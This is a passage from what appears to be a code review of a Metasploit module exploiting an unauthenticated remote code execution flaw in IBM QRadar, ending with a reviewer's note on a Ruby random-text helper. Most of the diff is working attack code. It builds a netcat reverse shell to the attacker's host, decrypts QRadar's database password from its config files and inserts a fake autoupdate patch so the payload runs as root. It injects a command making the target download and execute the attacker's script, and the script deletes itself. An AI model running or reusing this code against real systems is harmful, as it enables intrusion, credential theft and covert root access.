modules/exploits/linux/http/ibm_qradar_unauth_rce.rb

```diff
@@ -0,0 +1,221 @@
+
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s
+    service_uri = http_service + '/' + @payload_name
+
+    print_status("#{peer} - Starting up our web service on #{http_service} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => "/#{@payload_name}"
+    }})
+
+    @payload = %{#!/bin/bash
+
+# our payload that's going to be downloaded from our web server
+cat <<EOF > /store/configservices/staging/updates/#{root_payload}
+#!/bin/bash
+/usr/bin/nc -e /bin/sh #{datastore['LHOST']} #{datastore['LPORT']} &
+EOF
+
+### below is adapted from /opt/qradar/support/changePasswd.sh
+[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf"
+NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2`
+FRAMEWORKS_PROPERTIES_FILE="frameworks.properties"
+FORENSICS_USER_FILE="config_user.xml"
+FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE"
+
+# get the encrypted db password from the config
+PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=]*)(?=<)'`
+
+QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}')
+
+AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm
+P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-)
+P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-)
+
+#if 7.2.8 or greater, use new method for hashing and salting passwords
+if [ $QVERSION -gt 727 ]
+then
+    PASSWORD=$(perl <(echo ${P_DEC} | base64 -d) <(echo ${PASSWORDENCRYPTED}))
+      [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
+else
+    AESKEY=`grep 'aes.key=' $NVACONF/$FRAMEWORKS_PROPERTIES_FILE | cut -c9-`
+
+    PASSWORD=`/opt/qradar/bin/runjava.sh -Daes.key=$AESKEY com.q1labs.frameworks.crypto.AESUtil decrypt $PASSWORDENCRYPTED`
+    [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
+fi
+
+PGPASSWORD=$PASSWORD /usr/bin/psql -h localhost -U qradar qradar -c \
+"insert into autoupdate_patch values ('#{root_payload}',#{rand(1000)+100},'minor',false,#{rand(9999)+100},0,'',1,false,'','','',false)"
+
+# kill ourselves!
+(sleep 2 && rm -- "$0") &
+}
+
+    # let's do step 2 then, ask QRadar to download and execute our payload
+    print_status("#{peer} - Asking QRadar to download and execute #{service_uri}")
+
+    exec_cmd = "$(mkdir -p /store/configservices/staging/updates && wget --no-check-certificate -O " +
+      "/store/configservices/staging/updates/#{@payload_name} #{service_uri} && " +
+      "/bin/bash /store/configservices/staging/updates/#{@payload_name})"
+
+    payload_step2 = "pcap[0][pcap]" +
+      "=/#{rand_text_alpha_lower(rand(6) + 2) + '/' + rand_text_alpha_lower(rand(6) + 2)}" +
```

Comment:
A change was made to the `rand_text_*` methods not long ago. Now you can do this:

```ruby
rand_text_alpha(2..8)
```